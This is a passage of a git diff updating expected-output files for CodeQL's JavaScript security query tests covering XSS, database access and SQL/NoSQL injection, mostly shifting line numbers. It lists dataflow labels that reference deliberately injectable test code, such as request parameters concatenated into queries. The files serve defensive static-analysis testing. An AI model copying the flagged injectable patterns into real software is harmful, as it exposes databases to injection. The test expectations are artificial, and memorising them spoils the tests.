\\t\\t}\\n\\n\\t} | '$.fn.my_plugin' plugin | -| unsafe-jquery-plugin.js:179:5:179:18 | options.target | unsafe-jquery-plugin.js:178:27:178:33 | options | unsafe-jquery-plugin.js:179:5:179:18 | options.target | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:178:18:180:2 | functio ... T OK\\n\\t} | '$.fn.my_plugin' plugin | +| unsafe-jquery-plugin.js:179:5:179:18 | options.target | unsafe-jquery-plugin.js:178:27:178:33 | options | unsafe-jquery-plugin.js:179:5:179:18 | options.target | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:178:18:180:2 | functio ... lert\\n\\t} | '$.fn.my_plugin' plugin | | unsafe-jquery-plugin.js:192:19:192:28 | options.of | unsafe-jquery-plugin.js:185:28:185:34 | options | unsafe-jquery-plugin.js:192:19:192:28 | options.of | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:185:18:194:2 | functio ... et);\\n\\t} | '$.fn.position' plugin | diff --git a/javascript/ql/test/query-tests/Security/CWE-089/untyped/DatabaseAccesses.expected b/javascript/ql/test/query-tests/Security/CWE-089/untyped/DatabaseAccesses.expected index 0f95e5464fb9..52ce3076ba70 100644 --- a/javascript/ql/test/query-tests/Security/CWE-089/untyped/DatabaseAccesses.expected +++ b/javascript/ql/test/query-tests/Security/CWE-089/untyped/DatabaseAccesses.expected @@ -1,4 +1,4 @@ -| html-sanitizer.js:15:5:17:5 | connect ... K\\n ) | +| html-sanitizer.js:15:5:17:5 | connect ... t\\n ) | | json-schema-validator.js:27:13:27:27 | doc.find(query) | | json-schema-validator.js:30:13:30:27 | doc.find(query) | | json-schema-validator.js:33:13:33:27 | doc.find(query) | 
@@ -7,43 +7,43 @@ | json-schema-validator.js:55:13:55:27 | doc.find(query) | | json-schema-validator.js:59:13:59:27 | doc.find(query) | | json-schema-validator.js:61:13:61:27 | doc.find(query) | -| marsdb-flow-to.js:14:3:14:41 | db.myDo ... => {}) | -| marsdb.js:16:3:16:36 | doc.fin ... => {}) | -| minimongo.js:18:3:18:17 | doc.find(query) | -| mongodb.js:18:7:18:21 | doc.find(query) | -| mongodb.js:21:7:21:48 | doc.fin ... itle }) | -| mongodb.js:24:7:24:53 | doc.fin ... r(1) }) | -| mongodb.js:29:9:29:34 | doc.fin ... itle }) | -| mongodb.js:32:9:32:46 | doc.fin ... tle) }) | -| mongodb.js:43:7:43:21 | doc.find(query) | -| mongodb.js:54:7:54:21 | doc.find(query) | -| mongodb.js:65:3:65:17 | doc.find(query) | -| mongodb.js:73:5:77:27 | client\\n ... tag }) | -| mongodb.js:81:3:85:25 | importe ... tag }) | -| mongodb.js:98:5:98:19 | doc.find(query) | -| mongodb.js:112:5:112:19 | doc.find(query) | +| marsdb-flow-to.js:13:3:13:41 | db.myDo ... => {}) | +| marsdb.js:15:3:15:36 | doc.fin ... => {}) | +| minimongo.js:17:3:17:17 | doc.find(query) | +| mongodb.js:17:7:17:21 | doc.find(query) | +| mongodb.js:20:7:20:48 | doc.fin ... itle }) | +| mongodb.js:23:7:23:53 | doc.fin ... r(1) }) | +| mongodb.js:28:9:28:34 | doc.fin ... itle }) | +| mongodb.js:30:9:30:46 | doc.fin ... tle) }) | +| mongodb.js:41:7:41:21 | doc.find(query) | +| mongodb.js:51:7:51:21 | doc.find(query) | +| mongodb.js:61:3:61:17 | doc.find(query) | +| mongodb.js:69:5:72:27 | client\\n ... tag }) | +| mongodb.js:76:3:79:25 | importe ... tag }) | +| mongodb.js:92:5:92:19 | doc.find(query) | +| mongodb.js:105:5:105:19 | doc.find(query) | | mongodb_bodySafe.js:18:7:18:21 | doc.find(query) | -| mongodb_bodySafe.js:29:7:29:21 | doc.find(query) | -| mongoose.js:63:2:63:34 | Documen ... then(X) | -| mongoose.js:65:2:65:51 | Documen ... on(){}) | -| mongoose.js:67:2:68:27 | new Mon ... on(){}) | -| mongoose.js:71:2:78:9 | Documen ... .exec() | -| mongoose.js:85:2:85:52 | Documen ... 
query)) | -| mongoose.js:86:2:86:52 | Documen ... query)) | -| mongoose.js:87:2:87:57 | Documen ... query)) | -| mongoose.js:88:2:88:57 | Documen ... query)) | -| mongoose.js:89:2:89:52 | Documen ... query)) | -| mongoose.js:90:2:90:55 | Documen ... query)) | -| mongoose.js:92:2:92:52 | Documen ... query)) | -| mongoose.js:93:2:93:49 | Documen ... query)) | -| mongoose.js:94:2:94:57 | Documen ... query)) | -| mongoose.js:95:2:95:54 | Documen ... query)) | -| mongoose.js:96:2:96:52 | Documen ... query)) | -| mongoose.js:97:2:97:52 | Documen ... query)) | -| mongoose.js:99:2:99:50 | Documen ... query)) | -| mongoose.js:113:2:113:53 | Documen ... () { }) | -| mongoose.js:134:3:134:52 | Documen ... on(){}) | -| mongoose.js:136:3:136:52 | Documen ... on(){}) | +| mongodb_bodySafe.js:28:7:28:21 | doc.find(query) | +| mongoose.js:49:2:49:34 | Documen ... then(X) | +| mongoose.js:51:2:51:51 | Documen ... on(){}) | +| mongoose.js:53:2:54:27 | new Mon ... on(){}) | +| mongoose.js:57:2:64:9 | Documen ... .exec() | +| mongoose.js:71:2:71:52 | Documen ... query)) | +| mongoose.js:72:2:72:52 | Documen ... query)) | +| mongoose.js:73:2:73:57 | Documen ... query)) | +| mongoose.js:74:2:74:57 | Documen ... query)) | +| mongoose.js:75:2:75:52 | Documen ... query)) | +| mongoose.js:76:2:76:55 | Documen ... query)) | +| mongoose.js:78:2:78:52 | Documen ... query)) | +| mongoose.js:79:2:79:49 | Documen ... query)) | +| mongoose.js:80:2:80:57 | Documen ... query)) | +| mongoose.js:81:2:81:54 | Documen ... query)) | +| mongoose.js:82:2:82:52 | Documen ... query)) | +| mongoose.js:83:2:83:52 | Documen ... query)) | +| mongoose.js:85:2:85:50 | Documen ... query)) | +| mongoose.js:99:2:99:53 | Documen ... () { }) | +| mongoose.js:120:3:120:52 | Documen ... on(){}) | +| mongoose.js:122:3:122:52 | Documen ... on(){}) | | mysql.js:8:9:11:47 | connect ... ds) {}) | | mysql.js:14:9:16:47 | connect ... ds) {}) | | mysql.js:19:9:20:48 | connect ... ds) {}) | 
@@ -59,10 +59,10 @@ | pg-promise.js:17:3:17:21 | db.oneOrNone(query) | | pg-promise.js:18:3:18:17 | db.query(query) | | pg-promise.js:19:3:19:18 | db.result(query) | -| pg-promise.js:21:3:23:4 | db.one( ... OK\\n }) | -| pg-promise.js:24:3:27:4 | db.one( ... OK\\n }) | +| pg-promise.js:21:3:23:4 | db.one( ... rt\\n }) | +| pg-promise.js:24:3:27:4 | db.one( ... d,\\n }) | | pg-promise.js:28:3:31:4 | db.one( ... er\\n }) | -| pg-promise.js:32:3:35:4 | db.one( ... OK\\n }) | +| pg-promise.js:32:3:35:4 | db.one( ... rt\\n }) | | pg-promise.js:36:3:43:4 | db.one( ... ]\\n }) | | pg-promise.js:44:3:50:4 | db.one( ... }\\n }) | | pg-promise.js:51:3:58:4 | db.one( ... }\\n }) | @@ -88,7 +88,7 @@ | redis.js:49:18:49:47 | client. ... value") | | socketio.js:11:5:11:54 | db.run( ... ndle}`) | | tst2.js:7:3:7:62 | sql.que ... ms.id}` | -| tst2.js:9:3:9:85 | new sql ... + "'") | +| tst2.js:8:3:8:85 | new sql ... + "'") | | tst3.js:9:3:11:4 | pool.qu ... ts\\n }) | | tst3.js:16:3:18:4 | pool.qu ... ts\\n }) | | tst4.js:8:3:8:67 | db.get( ... + '"') | diff --git a/javascript/ql/test/query-tests/Security/CWE-089/untyped/SqlInjection.expected b/javascript/ql/test/query-tests/Security/CWE-089/untyped/SqlInjection.expected index 5ae279288cf8..e19e6731ee75 100644 --- a/javascript/ql/test/query-tests/Security/CWE-089/untyped/SqlInjection.expected +++ b/javascript/ql/test/query-tests/Security/CWE-089/untyped/SqlInjection.expected 
@@ -1,38 +1,38 @@ nodes | graphql.js:8:11:8:28 | id | semmle.label | id | | graphql.js:8:16:8:28 | req.params.id | semmle.label | req.params.id | -| graphql.js:10:34:20:5 | `\\n ... }\\n ` | semmle.label | `\\n ... }\\n ` | -| graphql.js:12:46:12:47 | id | semmle.label | id | -| graphql.js:26:11:26:28 | id | semmle.label | id | -| graphql.js:26:16:26:28 | req.params.id | semmle.label | req.params.id | -| graphql.js:27:30:27:40 | `foo ${id}` | semmle.label | `foo ${id}` | -| graphql.js:27:37:27:38 | id | semmle.label | id | -| graphql.js:30:32:30:42 | `foo ${id}` | semmle.label | `foo ${id}` | -| graphql.js:30:39:30:40 | id | semmle.label | id | -| graphql.js:33:18:33:28 | `foo ${id}` | semmle.label | `foo ${id}` | -| graphql.js:33:25:33:26 | id | semmle.label | id | -| graphql.js:39:11:39:28 | id | semmle.label | id | -| graphql.js:39:16:39:28 | req.params.id | semmle.label | req.params.id | -| graphql.js:44:14:44:24 | `foo ${id}` | semmle.label | `foo ${id}` | -| graphql.js:44:21:44:22 | id | semmle.label | id | -| graphql.js:48:44:48:54 | `foo ${id}` | semmle.label | `foo ${id}` | -| graphql.js:48:51:48:52 | id | semmle.label | id | -| graphql.js:55:11:55:28 | id | semmle.label | id | -| graphql.js:55:16:55:28 | req.params.id | semmle.label | req.params.id | -| graphql.js:56:39:56:49 | `foo ${id}` | semmle.label | `foo ${id}` | -| graphql.js:56:46:56:47 | id | semmle.label | id | -| graphql.js:58:66:58:76 | `foo ${id}` | semmle.label | `foo ${id}` | -| graphql.js:58:73:58:74 | id | semmle.label | id | -| graphql.js:74:9:74:25 | id | semmle.label | id | -| graphql.js:74:14:74:25 | req.query.id | semmle.label | req.query.id | -| graphql.js:75:46:75:64 | "{ foo" + id + " }" | semmle.label | "{ foo" + id + " }" | -| graphql.js:75:56:75:57 | id | semmle.label | id | -| graphql.js:84:14:90:8 | `{\\n ... }` | semmle.label | `{\\n ... 
}` | -| graphql.js:88:13:88:14 | id | semmle.label | id | -| graphql.js:119:11:119:28 | id | semmle.label | id | -| graphql.js:119:16:119:28 | req.params.id | semmle.label | req.params.id | -| graphql.js:120:38:120:48 | `foo ${id}` | semmle.label | `foo ${id}` | -| graphql.js:120:45:120:46 | id | semmle.label | id | +| graphql.js:9:34:19:5 | ` // $ ... }\\n ` | semmle.label | ` // $ ... }\\n ` | +| graphql.js:11:46:11:47 | id | semmle.label | id | +| graphql.js:25:11:25:28 | id | semmle.label | id | +| graphql.js:25:16:25:28 | req.params.id | semmle.label | req.params.id | +| graphql.js:26:30:26:40 | `foo ${id}` | semmle.label | `foo ${id}` | +| graphql.js:26:37:26:38 | id | semmle.label | id | +| graphql.js:29:32:29:42 | `foo ${id}` | semmle.label | `foo ${id}` | +| graphql.js:29:39:29:40 | id | semmle.label | id | +| graphql.js:32:18:32:28 | `foo ${id}` | semmle.label | `foo ${id}` | +| graphql.js:32:25:32:26 | id | semmle.label | id | +| graphql.js:38:11:38:28 | id | semmle.label | id | +| graphql.js:38:16:38:28 | req.params.id | semmle.label | req.params.id | +| graphql.js:43:14:43:24 | `foo ${id}` | semmle.label | `foo ${id}` | +| graphql.js:43:21:43:22 | id | semmle.label | id | +| graphql.js:47:44:47:54 | `foo ${id}` | semmle.label | `foo ${id}` | +| graphql.js:47:51:47:52 | id | semmle.label | id | +| graphql.js:54:11:54:28 | id | semmle.label | id | +| graphql.js:54:16:54:28 | req.params.id | semmle.label | req.params.id | +| graphql.js:55:39:55:49 | `foo ${id}` | semmle.label | `foo ${id}` | +| graphql.js:55:46:55:47 | id | semmle.label | id | +| graphql.js:57:66:57:76 | `foo ${id}` | semmle.label | `foo ${id}` | +| graphql.js:57:73:57:74 | id | semmle.label | id | +| graphql.js:73:9:73:25 | id | semmle.label | id | +| graphql.js:73:14:73:25 | req.query.id | semmle.label | req.query.id | +| graphql.js:74:46:74:64 | "{ foo" + id + " }" | semmle.label | "{ foo" + id + " }" | +| graphql.js:74:56:74:57 | id | semmle.label | id | +| graphql.js:82:14:88:8 | `{ 
// $ ... }` | semmle.label | `{ // $ ... }` | +| graphql.js:86:13:86:14 | id | semmle.label | id | +| graphql.js:117:11:117:28 | id | semmle.label | id | +| graphql.js:117:16:117:28 | req.params.id | semmle.label | req.params.id | +| graphql.js:118:38:118:48 | `foo ${id}` | semmle.label | `foo ${id}` | +| graphql.js:118:45:118:46 | id | semmle.label | id | | html-sanitizer.js:13:39:13:44 | param1 | semmle.label | param1 | | html-sanitizer.js:14:5:14:24 | param1 | semmle.label | param1 | | html-sanitizer.js:14:14:14:24 | xss(param1) | semmle.label | xss(param1) | 
@@ -84,125 +84,125 @@ nodes | marsdb-flow-to.js:10:17:10:18 | {} | semmle.label | {} | | marsdb-flow-to.js:11:17:11:24 | req.body | semmle.label | req.body | | marsdb-flow-to.js:11:17:11:30 | req.body.title | semmle.label | req.body.title | -| marsdb-flow-to.js:14:17:14:21 | query | semmle.label | query | +| marsdb-flow-to.js:13:17:13:21 | query | semmle.label | query | | marsdb.js:12:9:12:18 | query | semmle.label | query | | marsdb.js:12:17:12:18 | {} | semmle.label | {} | | marsdb.js:13:17:13:24 | req.body | semmle.label | req.body | | marsdb.js:13:17:13:30 | req.body.title | semmle.label | req.body.title | -| marsdb.js:16:12:16:16 | query | semmle.label | query | +| marsdb.js:15:12:15:16 | query | semmle.label | query | | minimongo.js:14:9:14:18 | query | semmle.label | query | | minimongo.js:14:17:14:18 | {} | semmle.label | {} | | minimongo.js:15:17:15:24 | req.body | semmle.label | req.body | | minimongo.js:15:17:15:30 | req.body.title | semmle.label | req.body.title | -| minimongo.js:18:12:18:16 | query | semmle.label | query | +| minimongo.js:17:12:17:16 | query | semmle.label | query | | mongodb.js:12:11:12:20 | query | semmle.label | query | | mongodb.js:12:19:12:20 | {} | semmle.label | {} | | mongodb.js:13:5:13:9 | query | semmle.label | query | | mongodb.js:13:19:13:26 | req.body | semmle.label | req.body | | mongodb.js:13:19:13:32 | req.body.title | semmle.label | req.body.title | -| mongodb.js:18:16:18:20 | query | semmle.label | query | -| mongodb.js:26:11:26:32 | title | semmle.label | title | -| mongodb.js:26:19:26:26 | req.body | semmle.label | req.body | -| mongodb.js:26:19:26:32 | req.body.title | semmle.label | req.body.title | -| mongodb.js:32:18:32:45 | { title ... itle) } | semmle.label | { title ... 
itle) } | -| mongodb.js:32:27:32:43 | JSON.parse(title) | semmle.label | JSON.parse(title) | -| mongodb.js:32:38:32:42 | title | semmle.label | title | -| mongodb.js:48:11:48:20 | query | semmle.label | query | -| mongodb.js:48:19:48:20 | {} | semmle.label | {} | -| mongodb.js:49:5:49:9 | query | semmle.label | query | -| mongodb.js:49:19:49:33 | req.query.title | semmle.label | req.query.title | -| mongodb.js:54:16:54:20 | query | semmle.label | query | -| mongodb.js:59:8:59:17 | query | semmle.label | query | -| mongodb.js:59:16:59:17 | {} | semmle.label | {} | -| mongodb.js:60:2:60:6 | query | semmle.label | query | -| mongodb.js:60:16:60:30 | req.query.title | semmle.label | req.query.title | -| mongodb.js:65:12:65:16 | query | semmle.label | query | -| mongodb.js:70:7:70:25 | tag | semmle.label | tag | -| mongodb.js:70:13:70:25 | req.query.tag | semmle.label | req.query.tag | -| mongodb.js:77:14:77:26 | { tags: tag } | semmle.label | { tags: tag } | -| mongodb.js:77:22:77:24 | tag | semmle.label | tag | -| mongodb.js:85:12:85:24 | { tags: tag } | semmle.label | { tags: tag } | -| mongodb.js:85:20:85:22 | tag | semmle.label | tag | -| mongodb.js:106:9:106:18 | query | semmle.label | query | -| mongodb.js:106:17:106:18 | {} | semmle.label | {} | -| mongodb.js:107:3:107:7 | query | semmle.label | query | -| mongodb.js:107:17:107:29 | queries.title | semmle.label | queries.title | -| mongodb.js:112:14:112:18 | query | semmle.label | query | +| mongodb.js:17:16:17:20 | query | semmle.label | query | +| mongodb.js:25:11:25:32 | title | semmle.label | title | +| mongodb.js:25:19:25:26 | req.body | semmle.label | req.body | +| mongodb.js:25:19:25:32 | req.body.title | semmle.label | req.body.title | +| mongodb.js:30:18:30:45 | { title ... itle) } | semmle.label | { title ... 
itle) } | +| mongodb.js:30:27:30:43 | JSON.parse(title) | semmle.label | JSON.parse(title) | +| mongodb.js:30:38:30:42 | title | semmle.label | title | +| mongodb.js:46:11:46:20 | query | semmle.label | query | +| mongodb.js:46:19:46:20 | {} | semmle.label | {} | +| mongodb.js:47:5:47:9 | query | semmle.label | query | +| mongodb.js:47:19:47:33 | req.query.title | semmle.label | req.query.title | +| mongodb.js:51:16:51:20 | query | semmle.label | query | +| mongodb.js:56:8:56:17 | query | semmle.label | query | +| mongodb.js:56:16:56:17 | {} | semmle.label | {} | +| mongodb.js:57:2:57:6 | query | semmle.label | query | +| mongodb.js:57:16:57:30 | req.query.title | semmle.label | req.query.title | +| mongodb.js:61:12:61:16 | query | semmle.label | query | +| mongodb.js:66:7:66:25 | tag | semmle.label | tag | +| mongodb.js:66:13:66:25 | req.query.tag | semmle.label | req.query.tag | +| mongodb.js:72:14:72:26 | { tags: tag } | semmle.label | { tags: tag } | +| mongodb.js:72:22:72:24 | tag | semmle.label | tag | +| mongodb.js:79:12:79:24 | { tags: tag } | semmle.label | { tags: tag } | +| mongodb.js:79:20:79:22 | tag | semmle.label | tag | +| mongodb.js:100:9:100:18 | query | semmle.label | query | +| mongodb.js:100:17:100:18 | {} | semmle.label | {} | +| mongodb.js:101:3:101:7 | query | semmle.label | query | +| mongodb.js:101:17:101:29 | queries.title | semmle.label | queries.title | +| mongodb.js:105:14:105:18 | query | semmle.label | query | | mongodb_bodySafe.js:23:11:23:20 | query | semmle.label | query | | mongodb_bodySafe.js:23:19:23:20 | {} | semmle.label | {} | | mongodb_bodySafe.js:24:5:24:9 | query | semmle.label | query | | mongodb_bodySafe.js:24:19:24:33 | req.query.title | semmle.label | req.query.title | -| mongodb_bodySafe.js:29:16:29:20 | query | semmle.label | query | +| mongodb_bodySafe.js:28:16:28:20 | query | semmle.label | query | | mongoose.js:20:8:20:17 | query | semmle.label | query | | mongoose.js:20:16:20:17 | {} | semmle.label | {} | | 
mongoose.js:21:2:21:6 | query | semmle.label | query | | mongoose.js:21:16:21:23 | req.body | semmle.label | req.body | | mongoose.js:21:16:21:29 | req.body.title | semmle.label | req.body.title | -| mongoose.js:24:21:24:27 | [query] | semmle.label | [query] | -| mongoose.js:24:22:24:26 | query | semmle.label | query | -| mongoose.js:27:17:27:21 | query | semmle.label | query | -| mongoose.js:30:22:30:26 | query | semmle.label | query | -| mongoose.js:33:21:33:25 | query | semmle.label | query | -| mongoose.js:36:28:36:32 | query | semmle.label | query | -| mongoose.js:39:16:39:20 | query | semmle.label | query | -| mongoose.js:42:19:42:23 | query | semmle.label | query | -| mongoose.js:45:28:45:32 | query | semmle.label | query | -| mongoose.js:48:28:48:32 | query | semmle.label | query | -| mongoose.js:51:28:51:32 | query | semmle.label | query | -| mongoose.js:54:22:54:26 | query | semmle.label | query | -| mongoose.js:57:18:57:22 | query | semmle.label | query | -| mongoose.js:60:22:60:26 | query | semmle.label | query | -| mongoose.js:63:21:63:25 | query | semmle.label | query | -| mongoose.js:65:32:65:36 | query | semmle.label | query | -| mongoose.js:67:27:67:31 | query | semmle.label | query | -| mongoose.js:68:8:68:12 | query | semmle.label | query | -| mongoose.js:71:17:71:21 | query | semmle.label | query | -| mongoose.js:72:10:72:14 | query | semmle.label | query | -| mongoose.js:73:8:73:12 | query | semmle.label | query | -| mongoose.js:74:7:74:11 | query | semmle.label | query | -| mongoose.js:75:16:75:20 | query | semmle.label | query | -| mongoose.js:76:12:76:16 | query | semmle.label | query | -| mongoose.js:77:10:77:14 | query | semmle.label | query | -| mongoose.js:81:37:81:41 | query | semmle.label | query | +| mongoose.js:23:21:23:27 | [query] | semmle.label | [query] | +| mongoose.js:23:22:23:26 | query | semmle.label | query | +| mongoose.js:25:17:25:21 | query | semmle.label | query | +| mongoose.js:27:22:27:26 | query | semmle.label | query 
| +| mongoose.js:29:21:29:25 | query | semmle.label | query | +| mongoose.js:31:28:31:32 | query | semmle.label | query | +| mongoose.js:33:16:33:20 | query | semmle.label | query | +| mongoose.js:35:19:35:23 | query | semmle.label | query | +| mongoose.js:37:28:37:32 | query | semmle.label | query | +| mongoose.js:39:28:39:32 | query | semmle.label | query | +| mongoose.js:41:28:41:32 | query | semmle.label | query | +| mongoose.js:43:22:43:26 | query | semmle.label | query | +| mongoose.js:45:18:45:22 | query | semmle.label | query | +| mongoose.js:47:22:47:26 | query | semmle.label | query | +| mongoose.js:49:21:49:25 | query | semmle.label | query | +| mongoose.js:51:32:51:36 | query | semmle.label | query | +| mongoose.js:53:27:53:31 | query | semmle.label | query | +| mongoose.js:54:8:54:12 | query | semmle.label | query | +| mongoose.js:57:17:57:21 | query | semmle.label | query | +| mongoose.js:58:10:58:14 | query | semmle.label | query | +| mongoose.js:59:8:59:12 | query | semmle.label | query | +| mongoose.js:60:7:60:11 | query | semmle.label | query | +| mongoose.js:61:16:61:20 | query | semmle.label | query | +| mongoose.js:62:12:62:16 | query | semmle.label | query | +| mongoose.js:63:10:63:14 | query | semmle.label | query | +| mongoose.js:67:37:67:41 | query | semmle.label | query | +| mongoose.js:68:46:68:50 | query | semmle.label | query | +| mongoose.js:69:47:69:51 | query | semmle.label | query | +| mongoose.js:71:46:71:50 | query | semmle.label | query | +| mongoose.js:73:51:73:55 | query | semmle.label | query | +| mongoose.js:75:46:75:50 | query | semmle.label | query | +| mongoose.js:78:46:78:50 | query | semmle.label | query | +| mongoose.js:80:51:80:55 | query | semmle.label | query | | mongoose.js:82:46:82:50 | query | semmle.label | query | -| mongoose.js:83:47:83:51 | query | semmle.label | query | -| mongoose.js:85:46:85:50 | query | semmle.label | query | -| mongoose.js:87:51:87:55 | query | semmle.label | query | -| 
mongoose.js:89:46:89:50 | query | semmle.label | query | -| mongoose.js:92:46:92:50 | query | semmle.label | query | -| mongoose.js:94:51:94:55 | query | semmle.label | query | -| mongoose.js:96:46:96:50 | query | semmle.label | query | -| mongoose.js:104:21:104:25 | query | semmle.label | query | -| mongoose.js:111:14:111:18 | query | semmle.label | query | -| mongoose.js:113:31:113:35 | query | semmle.label | query | -| mongoose.js:115:6:115:22 | id | semmle.label | id | -| mongoose.js:115:11:115:22 | req.query.id | semmle.label | req.query.id | -| mongoose.js:115:25:115:45 | cond | semmle.label | cond | -| mongoose.js:115:32:115:45 | req.query.cond | semmle.label | req.query.cond | -| mongoose.js:116:22:116:25 | cond | semmle.label | cond | -| mongoose.js:117:21:117:24 | cond | semmle.label | cond | -| mongoose.js:118:21:118:24 | cond | semmle.label | cond | -| mongoose.js:119:18:119:21 | cond | semmle.label | cond | -| mongoose.js:120:22:120:25 | cond | semmle.label | cond | -| mongoose.js:121:16:121:19 | cond | semmle.label | cond | -| mongoose.js:122:19:122:22 | cond | semmle.label | cond | -| mongoose.js:123:20:123:21 | id | semmle.label | id | -| mongoose.js:124:28:124:31 | cond | semmle.label | cond | -| mongoose.js:125:28:125:31 | cond | semmle.label | cond | -| mongoose.js:126:28:126:31 | cond | semmle.label | cond | -| mongoose.js:127:18:127:21 | cond | semmle.label | cond | -| mongoose.js:128:22:128:25 | cond | semmle.label | cond | -| mongoose.js:129:21:129:24 | cond | semmle.label | cond | -| mongoose.js:130:16:130:26 | { _id: id } | semmle.label | { _id: id } | -| mongoose.js:130:23:130:24 | id | semmle.label | id | -| mongoose.js:133:38:133:42 | query | semmle.label | query | -| mongoose.js:136:30:136:34 | query | semmle.label | query | +| mongoose.js:90:21:90:25 | query | semmle.label | query | +| mongoose.js:97:14:97:18 | query | semmle.label | query | +| mongoose.js:99:31:99:35 | query | semmle.label | query | +| mongoose.js:101:6:101:22 | id | 
semmle.label | id | +| mongoose.js:101:11:101:22 | req.query.id | semmle.label | req.query.id | +| mongoose.js:101:25:101:45 | cond | semmle.label | cond | +| mongoose.js:101:32:101:45 | req.query.cond | semmle.label | req.query.cond | +| mongoose.js:102:22:102:25 | cond | semmle.label | cond | +| mongoose.js:103:21:103:24 | cond | semmle.label | cond | +| mongoose.js:104:21:104:24 | cond | semmle.label | cond | +| mongoose.js:105:18:105:21 | cond | semmle.label | cond | +| mongoose.js:106:22:106:25 | cond | semmle.label | cond | +| mongoose.js:107:16:107:19 | cond | semmle.label | cond | +| mongoose.js:108:19:108:22 | cond | semmle.label | cond | +| mongoose.js:109:20:109:21 | id | semmle.label | id | +| mongoose.js:110:28:110:31 | cond | semmle.label | cond | +| mongoose.js:111:28:111:31 | cond | semmle.label | cond | +| mongoose.js:112:28:112:31 | cond | semmle.label | cond | +| mongoose.js:113:18:113:21 | cond | semmle.label | cond | +| mongoose.js:114:22:114:25 | cond | semmle.label | cond | +| mongoose.js:115:21:115:24 | cond | semmle.label | cond | +| mongoose.js:116:16:116:26 | { _id: id } | semmle.label | { _id: id } | +| mongoose.js:116:23:116:24 | id | semmle.label | id | +| mongoose.js:119:38:119:42 | query | semmle.label | query | +| mongoose.js:122:30:122:34 | query | semmle.label | query | | mongooseJsonParse.js:19:11:19:20 | query | semmle.label | query | | mongooseJsonParse.js:19:19:19:20 | {} | semmle.label | {} | | mongooseJsonParse.js:20:19:20:44 | JSON.pa ... y.data) | semmle.label | JSON.pa ... y.data) | | mongooseJsonParse.js:20:19:20:50 | JSON.pa ... ).title | semmle.label | JSON.pa ... ).title | | mongooseJsonParse.js:20:30:20:43 | req.query.data | semmle.label | req.query.data | -| mongooseJsonParse.js:23:19:23:23 | query | semmle.label | query | +| mongooseJsonParse.js:22:19:22:23 | query | semmle.label | query | | mongooseModelClient.js:10:7:10:32 | v | semmle.label | v | | mongooseModelClient.js:10:11:10:32 | JSON.pa ... 
body.x) | semmle.label | JSON.pa ... body.x) | | mongooseModelClient.js:10:22:10:29 | req.body | semmle.label | req.body | @@ -268,8 +268,8 @@ nodes | socketio.js:10:25:10:30 | handle | semmle.label | handle | | socketio.js:11:12:11:53 | `INSERT ... andle}` | semmle.label | `INSERT ... andle}` | | socketio.js:11:46:11:51 | handle | semmle.label | handle | -| tst2.js:9:27:9:84 | "select ... d + "'" | semmle.label | "select ... d + "'" | -| tst2.js:9:66:9:78 | req.params.id | semmle.label | req.params.id | +| tst2.js:8:27:8:84 | "select ... d + "'" | semmle.label | "select ... d + "'" | +| tst2.js:8:66:8:78 | req.params.id | semmle.label | req.params.id | | tst3.js:7:7:8:55 | query1 | semmle.label | query1 | | tst3.js:8:16:8:34 | req.params.category | semmle.label | req.params.category | | tst3.js:9:14:9:19 | query1 | semmle.label | query1 | 
@@ -278,34 +278,34 @@ nodes | tst.js:10:10:10:64 | 'SELECT ... d + '"' | semmle.label | 'SELECT ... d + '"' | | tst.js:10:46:10:58 | req.params.id | semmle.label | req.params.id | edges -| graphql.js:8:11:8:28 | id | graphql.js:12:46:12:47 | id | provenance | | +| graphql.js:8:11:8:28 | id | graphql.js:11:46:11:47 | id | provenance | | | graphql.js:8:16:8:28 | req.params.id | graphql.js:8:11:8:28 | id | provenance | | -| graphql.js:12:46:12:47 | id | graphql.js:10:34:20:5 | `\\n ... }\\n ` | provenance | | -| graphql.js:26:11:26:28 | id | graphql.js:27:37:27:38 | id | provenance | | -| graphql.js:26:11:26:28 | id | graphql.js:30:39:30:40 | id | provenance | | -| graphql.js:26:11:26:28 | id | graphql.js:33:25:33:26 | id | provenance | | -| graphql.js:26:16:26:28 | req.params.id | graphql.js:26:11:26:28 | id | provenance | | -| graphql.js:27:37:27:38 | id | graphql.js:27:30:27:40 | `foo ${id}` | provenance | | -| graphql.js:30:39:30:40 | id | graphql.js:30:32:30:42 | `foo ${id}` | provenance | | -| graphql.js:33:25:33:26 | id | graphql.js:33:18:33:28 | `foo ${id}` | provenance | | -| graphql.js:39:11:39:28 | id | graphql.js:44:21:44:22 | id | provenance | | -| graphql.js:39:11:39:28 | id | graphql.js:48:51:48:52 | id | provenance | | -| graphql.js:39:16:39:28 | req.params.id | graphql.js:39:11:39:28 | id | provenance | | -| graphql.js:44:21:44:22 | id | graphql.js:44:14:44:24 | `foo ${id}` | provenance | | -| graphql.js:48:51:48:52 | id | graphql.js:48:44:48:54 | `foo ${id}` | provenance | | -| graphql.js:55:11:55:28 | id | graphql.js:56:46:56:47 | id | provenance | | -| graphql.js:55:11:55:28 | id | graphql.js:58:73:58:74 | id | provenance | | -| graphql.js:55:16:55:28 | req.params.id | graphql.js:55:11:55:28 | id | provenance | | -| graphql.js:56:46:56:47 | id | graphql.js:56:39:56:49 | `foo ${id}` | provenance | | -| graphql.js:58:73:58:74 | id | graphql.js:58:66:58:76 | `foo ${id}` | provenance | | -| graphql.js:74:9:74:25 | id | graphql.js:75:56:75:57 | id | 
provenance | | -| graphql.js:74:9:74:25 | id | graphql.js:88:13:88:14 | id | provenance | | -| graphql.js:74:14:74:25 | req.query.id | graphql.js:74:9:74:25 | id | provenance | | -| graphql.js:75:56:75:57 | id | graphql.js:75:46:75:64 | "{ foo" + id + " }" | provenance | | -| graphql.js:88:13:88:14 | id | graphql.js:84:14:90:8 | `{\\n ... }` | provenance | | -| graphql.js:119:11:119:28 | id | graphql.js:120:45:120:46 | id | provenance | | -| graphql.js:119:16:119:28 | req.params.id | graphql.js:119:11:119:28 | id | provenance | | -| graphql.js:120:45:120:46 | id | graphql.js:120:38:120:48 | `foo ${id}` | provenance | | +| graphql.js:11:46:11:47 | id | graphql.js:9:34:19:5 | ` // $ ... }\\n ` | provenance | | +| graphql.js:25:11:25:28 | id | graphql.js:26:37:26:38 | id | provenance | | +| graphql.js:25:11:25:28 | id | graphql.js:29:39:29:40 | id | provenance | | +| graphql.js:25:11:25:28 | id | graphql.js:32:25:32:26 | id | provenance | | +| graphql.js:25:16:25:28 | req.params.id | graphql.js:25:11:25:28 | id | provenance | | +| graphql.js:26:37:26:38 | id | graphql.js:26:30:26:40 | `foo ${id}` | provenance | | +| 